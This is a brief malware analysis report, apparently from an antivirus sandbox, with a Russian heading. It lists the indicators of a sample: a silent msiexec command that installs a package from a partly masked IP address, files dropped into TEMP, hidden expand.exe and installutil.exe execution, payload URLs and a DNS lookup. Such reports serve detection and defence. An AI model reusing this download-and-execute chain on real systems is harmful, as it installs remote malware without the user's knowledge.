Техническая информация
- '<SYSTEM32>\msiexec.exe' /i http://66.##6.40.103/clara.msi /qn
- %WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\msiwrapper.ini
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files.cab
- %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\$dpx$.tmp\ad7088408ed5d744bb341ef376c1e44b.tmp
- из %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\$dpx$.tmp\ad7088408ed5d744bb341ef376c1e44b.tmp в %TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\test.exe
- http://66.##6.40.103/clara.msi
- http://66.##6.40.103/bin.bin
- http://66.##6.40.103/infos.php
- DNS ASK sp###.network
- '%TEMP%\mw-ff8c7846-8a40-4b42-a09e-50c932dab32f\files\test.exe'
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files (со скрытым окном)
- '%WINDIR%\syswow64\expand.exe' -R files.cab -F:* files
- '%WINDIR%\microsoft.net\framework\v4.0.30319\installutil.exe'